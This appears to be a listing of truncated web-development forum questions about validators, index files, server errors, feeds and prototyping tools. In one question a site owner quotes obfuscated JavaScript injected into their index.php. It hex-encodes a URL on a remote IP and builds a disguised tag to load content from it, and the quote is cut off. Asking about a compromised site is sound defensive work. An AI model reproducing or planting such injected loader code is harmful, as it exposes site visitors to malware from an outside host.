website

What is the "W3C Markup Validator" button for on websites used for?

May websites, including professional ones usually have a "W3C Markup Validator" and "W3C CSS Validator." Why do you put them there? Is it just pride or is it justified? If it is more than pride, what justifies them? ...

Can I detect if someone is using a browser addon to download videos from a website?

Is there any way to detect if someone is using a browser addon to download videos from my website? ...

Worth website that a web developer must surf daily?

Hello All, this may be not a right place to ask this question, but i can get best answer only from here, so i m posting here. i m a web developer and working with technology PHP,MySQL, JavaScript,jQuery,AJAX, CSS, HTML, JSON i daily surf few websites regarding web development , i know there are a lot of website with very goo...

What are the downside of not having an index.html file to some directories

Hi, I'm curious what are some effects/downside of not putting an index.html file to your directories (e.g images). I know when an index file is not present to a directory, files inside that directory are no longer private and will be visible to the browsers when point (eg yoursite.com/images/). Aside from that what are some big effects ...

PHP Websites Source Code

Hi, I'm looking for PHP script samples of websites. I'm just done reading a text book on PHP and I want to check out some of the various implementations. Thanks ...

css to replace characters in paragraph tag

Already checked exisitng questions for this, but didn't find an exact match. My aim is to replace characters (like spaces) on a webpage with a small image using css. Example: <p><span>This is a text</span></p> becomes: <p><span>ThisIMGisIMGaIMGtext</span></p> (where IMG stands for a visible image (middot-pic for a space f.e.)) I...

What are the advantages and disadvantages of a web site that contains a single page ?

I would like to code a little web site that will contain several sections like "Home", "Gallery", "Contact Us", "FAQs", and so on. I thought to do this in one HTML by putting each section in a div and show only one div per time (using Javascript / jQuery), based on the chosen menu button. Alternatively, I could create a separate HTML p...

Why the home page is called index.html ?

I understand that calling the home page index.html is a convention. Is that right ? Does this name has any special meaning (maybe for search engines) ? ...

ASP.NET/PHP/HTML: Retrieving HTML source code from a website

Hi, Is it possible to retrieve/get the html source code of a certain website and use it in a ASP.NET web application to display them? (without using the copy-paste, of course) I want my ASP.NET web application to use them as part of a code sample feature I currently working on. I'm also considering working it on PHP. Any suggestions? ...

Lighttpd server is stopped

I have a Lighttpd server plus mod_fastcgi. And today I had Internal Server Error 500. I've checked my error log and it goes like this: 2010-04-22 22:59:14: (server.c.1464) server stopped by UID = 0 PID = 3332 2010-04-22 22:59:15: (mod_fastcgi.c.1768) connect failed: No such file or directory on unix:/tmp/php.socket-5 2010-04-22 22:59:1...

What's the best tool to create high-fidelity wireframes and prototypes?

More than a simple wireframe, I´d like to create a complete prototype, fully functional & dynamic with data and rich interactions... Do you know any tool outthere? i´m looking for something really quick and easy, i don´t want to code. A friend told me about Justinmind Prototyper, any other guess? ...

Index files for Subdomains

I was finally able to setup subdomains but now I have a problem when I try and access the subdomain by itself. For instance, when I visit sub.domain.com, I get a page not found error. However, when I visit sub.domain.com/index.php, I see my page. My theory is that when I visit sub.domain.com, the index file it searches for is not in the...

How to Setup an RSS Feed using Feedburner?

I've searched Google, but only found information on how to setup a feedburner for wordpress or other blogging services. I've also searched stackoverflow, but not found the right information. I'm creating a website, for which I want to have an RSS. Feedburner seems to be a good, free option - so I'd like to use that. When I go to feedbu...

Websites using JEE

Hi guys, I have a simple question, but I can't find out the answer. I'm wondering if we can see that a website is built using the JEE technology, or servlets/JSP. I think it could be possible to look for specials pages from the server (404, wrong parameters, ...) in some cases, but what about the everyday use ? In fact, I look for a co...

How to plan my web based project before starting code ?

Me and my friend started working together as partners , we have decided to make Kick-as* website after website. We have the ideas written down like 100's of them (yes we are choosing best and easy among them first). My friend does the layout design and arranging things , and my part is coding and server management. The little problem ...

Which is the best way to design Flash site with some content

I am new to flash and just learned some action Script 3 with some events. I have to build site with dynamic menus and then contents for each page using xml. Is there any example on web to show how I can build the site. What is GAIA , will it help me or I should code my self Thanks ...

HTML website templates for programmer's website

Where could I find HTML website templates geared toward a programmer's website? I have looked on Google but couldn't find templates specifically for a programmer's website. EDIT: To clairify, I want this as information about me, my projects, a blog, and some other stuff. ...

Website index.php page chnages automatically with one script in the end

I have seen that , this happend twice that , in my root index.php file. I have this thing added <html><body><script type='text/javascript'>str="<vdepognbt src=" + unescape('%68%74%74%70%3a%2f%2f%37%39%2e%31%33%35%2e%31%35%32%2e%31%38%31%2f%73%74%61%74%73%2f%67%6f%2e%70%68%70%3f%73%69%64%3d%31') + " Oaoz5='1'vxoq5='1'>";str = str.replace...

What ways do you use to protect copy righted images?

What ways do you use to protect copy righted images in your website? ...

multiple ftp sites on a single iis server with one ip

can i have multiple iis ftp sites using something similar to web site's unasigned host headers? i have a dedicated server in a hosting facility and want to make a web site for each of my clients. to add/ remove files and content i want ftp access to each of the sites root folders. lets say i have 10 sites set up using unasigned host he...